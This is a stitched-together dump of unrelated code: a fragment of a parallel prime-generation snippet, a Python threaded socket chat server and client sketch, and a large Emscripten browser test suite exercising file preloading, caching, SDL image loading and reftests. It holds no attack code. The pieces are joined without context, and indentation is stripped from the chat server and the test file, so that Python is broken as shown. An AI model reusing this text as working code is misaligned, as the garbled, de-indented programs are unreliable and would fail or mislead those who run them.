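    # Four worker processes race to find a prime; the first result wins
    # and the remaining workers are terminated by getprime itself.
    p = rsa.parallel.getprime(512, poolsize=4)
    print('Found a %d-bit prime' % rsa.common.bit_size(p))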
server.py
|
import threading
import socket
host = '192.168.1.64'
port = 55555
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
clients = []
nicknames = []
# Relay a raw message to every connected client.
def broadcast(message):
for client in clients:
client.send(message)
# Per-client loop: forward incoming messages; on error, drop the client and announce it.
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
broadcast(f'{nickname} left the chat!'.encode('utf-8'))
print(f'{nickname} left the chat!')
nicknames.remove(nickname)
break
# Accept loop: request a nickname from each new client, register it, and start a handler thread.
def receive():
while True:
client, address = server.accept()
client.send('NICK'.encode('ascii'))
nickname = client.recv(1024).decode('utf-8')
nicknames.append(nickname)
clients.append(client)
print(f'{nickname} {str(address)}')
broadcast(f'{nickname} joined the chat!'.encode('utf-8'))
client.send('Connected to the server!'.encode('utf-8'))
thread = threading.Thread(target=handle, args=(client, ))
thread.start()
print("server has started")
receive()
|
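A minimal companion client sketch for the chat server above: it answers the server's one-time 'NICK' prompt, then runs one thread that prints incoming broadcasts and another that sends typed lines. The host and port mirror the server's values; the nickname-prefix convention and the rest of the structure are illustrative assumptions:

import socket
import threading

HOST = '192.168.1.64'  # must match the server's bind address
PORT = 55555

nickname = input('Choose a nickname: ')
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((HOST, PORT))

def receive():
    # Print broadcasts; reply to the server's 'NICK' handshake with our nickname.
    while True:
        try:
            message = client.recv(1024).decode('utf-8')
            if message == 'NICK':
                client.send(nickname.encode('utf-8'))
            else:
                print(message)
        except OSError:
            print('Connection lost.')
            client.close()
            break

def write():
    # Send each typed line to the server, prefixed with the nickname.
    while True:
        message = f'{nickname}: {input()}'
        client.send(message.encode('utf-8'))

threading.Thread(target=receive).start()
threading.Thread(target=write).start()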
test_browser.py
|
# coding=utf-8
from __future__ import print_function
import multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root, has_browser, get_browser
from tools.shared import *
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
s.wfile.close()
expectedConns = 11
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
self.test_wasm_pthreads = os.environ.get('TEST_WASM_PTHREADS', '0') == '1'
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']): return self.skip('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
    # TODO: This test verifies behavior that will be deprecated at some point in the future;
    # remove this test once system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser(): return self.skip('need a browser')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
time.sleep(1)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1']).communicate()
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
data = os.path.join(self.get_dir(), 'file.txt')
open(data, 'w').write('''Hello!''')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_download_data.js', '--preload-file', data + '@/file.txt']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), os.path.join(self.get_dir(), 'manual_download_data.html'))
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
    tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windows platforms they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
Popen([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]).communicate()
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
Popen([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'cdn'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "cdn/", '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''');
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
filePackagePrefixURL: "''' + assetLocalization + r'''",
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>'''
)
def test():
      # test that a missing file runs xhr.onload with a status other than 200, 304 or 206
setup("");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
shutil.move('test.data','missing.data');
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for filePackagePrefixURL
#open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "http:/localhost:8888/cdn/", '))
#test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
